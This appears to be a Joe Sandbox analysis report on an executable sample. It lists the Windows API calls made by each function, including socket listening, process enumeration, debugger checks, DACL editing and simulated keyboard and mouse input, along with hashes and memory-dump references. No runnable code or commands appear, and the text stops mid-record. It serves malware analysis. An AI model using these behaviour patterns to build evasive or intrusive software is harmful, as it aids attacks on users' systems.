                                                                                  • Opcode Fuzzy Hash: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                                                                  • Instruction Fuzzy Hash: F221C971640205ABF7108FA4EC4EF7FB3ACE708702F144569FE09D51D1D6BA5D408765
                                                                                  APIs
                                                                                    • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00436E45
                                                                                    • Part of subcall function 00436E2B: GetLastError.KERNEL32(?,00000000,?), ref: 00436E4F
                                                                                    • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00436E75
                                                                                    • Part of subcall function 00436DF7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00436E12
                                                                                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0044618A
                                                                                  • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004461BE
                                                                                  • GetLengthSid.ADVAPI32(?), ref: 004461D0
                                                                                  • GetAce.ADVAPI32(?,00000000,?), ref: 0044620D
                                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00446229
                                                                                  • GetLengthSid.ADVAPI32(?), ref: 00446241
                                                                                  • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0044626A
                                                                                  • CopySid.ADVAPI32(00000000), ref: 00446271
                                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004462A3
                                                                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004462C5
                                                                                  • SetUserObjectSecurity.USER32(?,00000004,?), ref: 004462D8
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                  • String ID:
                                                                                  • API String ID: 1255039815-0
                                                                                  • Opcode ID: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                                                                  • Instruction ID: cbecfdc94e872455e881353a2ef69e95113e06a92746e25f2a634f38edc45108
                                                                                  • Opcode Fuzzy Hash: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                                                                  • Instruction Fuzzy Hash: C251BC71A00209BBEB10EFA1CD84EEFB778BF49704F01855EF515A7241D6B8DA05CB69
                                                                                  APIs
                                                                                  • __swprintf.LIBCMT ref: 00433073
                                                                                  • __swprintf.LIBCMT ref: 00433085
                                                                                  • __wcsicoll.LIBCMT ref: 00433092
                                                                                  • FindResourceW.KERNEL32(?,?,0000000E), ref: 004330A5
                                                                                  • LoadResource.KERNEL32(?,00000000), ref: 004330BD
                                                                                  • LockResource.KERNEL32(00000000), ref: 004330CA
                                                                                  • FindResourceW.KERNEL32(?,?,00000003), ref: 004330F7
                                                                                  • LoadResource.KERNEL32(?,00000000), ref: 00433105
                                                                                  • SizeofResource.KERNEL32(?,00000000), ref: 00433114
                                                                                  • LockResource.KERNEL32(?), ref: 00433120
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll
                                                                                  • String ID:
                                                                                  • API String ID: 1158019794-0
                                                                                  • Opcode ID: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                                                                  • Instruction ID: 48d2d5a3af9b637b7fc6f2c6b5a7fdd3517197a5f8dc2ef3994740021b7ed835
                                                                                  • Opcode Fuzzy Hash: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                                                                  • Instruction Fuzzy Hash: C741F1322002146BDB10EF65EC84FAB37ADEB89321F00846BFD01C6245E779DA51C7A8
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                  • String ID:
                                                                                  • API String ID: 1737998785-0
                                                                                  • Opcode ID: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                                                                  • Instruction ID: d84b136cee2c902db59abfe4f82a3f409d39725fe24efd6a62fd8a04edebb5dd
                                                                                  • Opcode Fuzzy Hash: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                                                                  • Instruction Fuzzy Hash: 334114726001119FC310EFA5EC89B5EB7A4FF54315F00856EF909EB3A1EB75A941CB88
                                                                                  APIs
                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 0045D627
                                                                                  • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D6B5
                                                                                  • GetLastError.KERNEL32 ref: 0045D6BF
                                                                                  • SetErrorMode.KERNEL32(00000000,?), ref: 0045D751
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: Error$Mode$DiskFreeLastSpace
                                                                                  • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                  • API String ID: 4194297153-14809454
                                                                                  • Opcode ID: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                                                                  • Instruction ID: 1f300c266cb1daf6abeae651b696e439ee3a0372042695327ab67fb83666ce96
                                                                                  • Opcode Fuzzy Hash: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                                                                  • Instruction Fuzzy Hash: FE418235D00209DFCB10EFA5C884A9DB7B4FF48315F10846BE905AB352D7799A85CB69
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memmove$_strncmp
                                                                                  • String ID: @oH$\$^$h
                                                                                  • API String ID: 2175499884-3701065813
                                                                                  • Opcode ID: 988809b36a944a9929e300e154a4cfc85b4d4f50dea7e6e4a67b5f519bc2876c
                                                                                  • Instruction ID: 796dcd1322dc9123c5f4e5533c800aedaabe8dca19c5b95ba0af32eff2573e22
                                                                                  • Opcode Fuzzy Hash: 988809b36a944a9929e300e154a4cfc85b4d4f50dea7e6e4a67b5f519bc2876c
                                                                                  • Instruction Fuzzy Hash: 4242E170E04249CFEB14CF69C8806AEBBF2FF85304F2481AAD856AB351D7399946CF55
                                                                                  APIs
                                                                                  • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 0046530D
                                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 0046531C
                                                                                  • bind.WSOCK32(00000000,?,00000010), ref: 00465356
                                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00465363
                                                                                  • closesocket.WSOCK32(00000000,00000000), ref: 00465377
                                                                                  • listen.WSOCK32(00000000,00000005), ref: 00465381
                                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 004653A9
                                                                                  • closesocket.WSOCK32(00000000,00000000), ref: 004653BD
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$closesocket$bindlistensocket
                                                                                  • String ID:
                                                                                  • API String ID: 540024437-0
                                                                                  • Opcode ID: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                                                                  • Instruction ID: 689f190a2b8ca197395c4559ba4ec64c13dad074e2778b61c05f6be918bdb8b0
                                                                                  • Opcode Fuzzy Hash: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                                                                  • Instruction Fuzzy Hash: A8319331200500ABD310EF25DD89B6EB7A8EF44725F10866EF855E73D1DBB4AC818B99
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: ERCP$VUUU$VUUU$VUUU$XjH
                                                                                  • API String ID: 0-2872873767
                                                                                  • Opcode ID: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                                                                  • Instruction ID: d175e7d0ae6fb3d700f9da8fb6b70819649eb02c4ceaf458d011f7582104736e
                                                                                  • Opcode Fuzzy Hash: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                                                                  • Instruction Fuzzy Hash: D772D871A042198BEF24CF58C8807AEB7F1EB42314F25829BD859A7380D7799DC5CF5A
                                                                                  APIs
                                                                                  • CreateToolhelp32Snapshot.KERNEL32 ref: 00475608
                                                                                  • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00475618
                                                                                  • __wsplitpath.LIBCMT ref: 00475644
                                                                                    • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                                  • _wcscat.LIBCMT ref: 00475657
                                                                                  • __wcsicoll.LIBCMT ref: 0047567B
                                                                                  • Process32NextW.KERNEL32(00000000,?), ref: 004756AB
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 004756BA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                                                                  • String ID:
                                                                                  • API String ID: 2547909840-0
                                                                                  • Opcode ID: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                                                                  • Instruction ID: 52239f647ae7113ca4c6e3167181772f82882466072c53a1302db900a9aecbbd
                                                                                  • Opcode Fuzzy Hash: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                                                                  • Instruction Fuzzy Hash: B3518671900618ABDB10DF55CD85FDE77B8EF44704F1084AAF509AB282DA75AF84CF68
                                                                                  APIs
                                                                                    • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                    • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 004524DF
                                                                                  • Sleep.KERNEL32(0000000A), ref: 0045250B
                                                                                  • FindNextFileW.KERNEL32(?,?), ref: 004525E9
                                                                                  • FindClose.KERNEL32(?), ref: 004525FF
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: Find$File$CloseFirstNextSleep_memmove_wcslen
                                                                                  • String ID: *.*$\VH
                                                                                  • API String ID: 2786137511-2657498754
                                                                                  • Opcode ID: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                                                                  • Instruction ID: de376bcde865418ddd8e10142a6165d1fec8b8ecf5afc9fd422e88b207ce0255
                                                                                  • Opcode Fuzzy Hash: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                                                                  • Instruction Fuzzy Hash: 37417F7190021DABDB14DF64CD58AEE77B4AF49305F14445BEC09A3281E678EE49CB98
                                                                                  APIs
                                                                                  • IsDebuggerPresent.KERNEL32 ref: 00421FC1
                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00421FD6
                                                                                  • UnhandledExceptionFilter.KERNEL32(pqI), ref: 00421FE1
                                                                                  • GetCurrentProcess.KERNEL32(C0000409), ref: 00421FFD
                                                                                  • TerminateProcess.KERNEL32(00000000), ref: 00422004
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                  • String ID: pqI
                                                                                  • API String ID: 2579439406-2459173057
                                                                                  • Opcode ID: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                                                                  • Instruction ID: 2caf929301e55fbdfba35cdc3931bb3174c20cf3198a7c5bb5494214f042e870
                                                                                  • Opcode Fuzzy Hash: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                                                                  • Instruction Fuzzy Hash: 9E21CDB45392059FCB50DF65FE456483BA4BB68304F5005BBF90987371E7B969818F0D
                                                                                  APIs
                                                                                  • __wcsicoll.LIBCMT ref: 00433349
                                                                                  • mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 0043335F
                                                                                  • __wcsicoll.LIBCMT ref: 00433375
                                                                                  • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043338B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: __wcsicollmouse_event
                                                                                  • String ID: DOWN
                                                                                  • API String ID: 1033544147-711622031
                                                                                  • Opcode ID: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                                                                  • Instruction ID: c5effa3e7e2998e6ee15a8e10ce6e2e5d36a5fc043d4170c53cc9f091e4fe068
                                                                                  • Opcode Fuzzy Hash: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                                                                  • Instruction Fuzzy Hash: 78F0A0726846103AF80026947C02EFB334C9B26767F004023FE0CD1280EA59290557BD
                                                                                  APIs
                                                                                  • GetKeyboardState.USER32(?), ref: 0044C3D2
                                                                                  • SetKeyboardState.USER32(00000080), ref: 0044C3F6
                                                                                  • PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C43A
                                                                                  • PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C472
                                                                                  • SendInput.USER32(00000001,?,0000001C), ref: 0044C4FF
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: KeyboardMessagePostState$InputSend
                                                                                  • String ID:
                                                                                  • API String ID: 3031425849-0
                                                                                  • Opcode ID: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                                                                  • Instruction ID: ca9f4cb769efad0e1be190fe8763212e5a79bd7c4ee8908ff6f5a5d8a4a0dc9b
                                                                                  • Opcode Fuzzy Hash: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                                                                  • Instruction Fuzzy Hash: 4D415D755001082AEB109FA9DCD5BFFBB68AF96320F04815BFD8456283C378D9518BF8
                                                                                  APIs
                                                                                    • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                                                                  • socket.WSOCK32(00000002,00000002,00000011,?,00000000), ref: 0047666F
                                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00476692
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLastinet_addrsocket
                                                                                  • String ID:
                                                                                  • API String ID: 4170576061-0
                                                                                  • Opcode ID: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                                                                                  • Instruction ID: b6cffcacb6afaf0b8cd9bee7f3c7ce362d61c656181a10c6507bcc72ef542d5a
                                                                                  • Opcode Fuzzy Hash: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                                                                                  • Instruction Fuzzy Hash: 604129326002005BD710EF39DC86F5A73D59F44728F15866FF944AB3C2DABAEC418799
                                                                                  APIs
                                                                                    • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                                                  • IsWindowVisible.USER32 ref: 0047A368
                                                                                  • IsWindowEnabled.USER32 ref: 0047A378
                                                                                  • GetForegroundWindow.USER32(?,?,?,00000001), ref: 0047A385
                                                                                  • IsIconic.USER32 ref: 0047A393
                                                                                  • IsZoomed.USER32 ref: 0047A3A1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
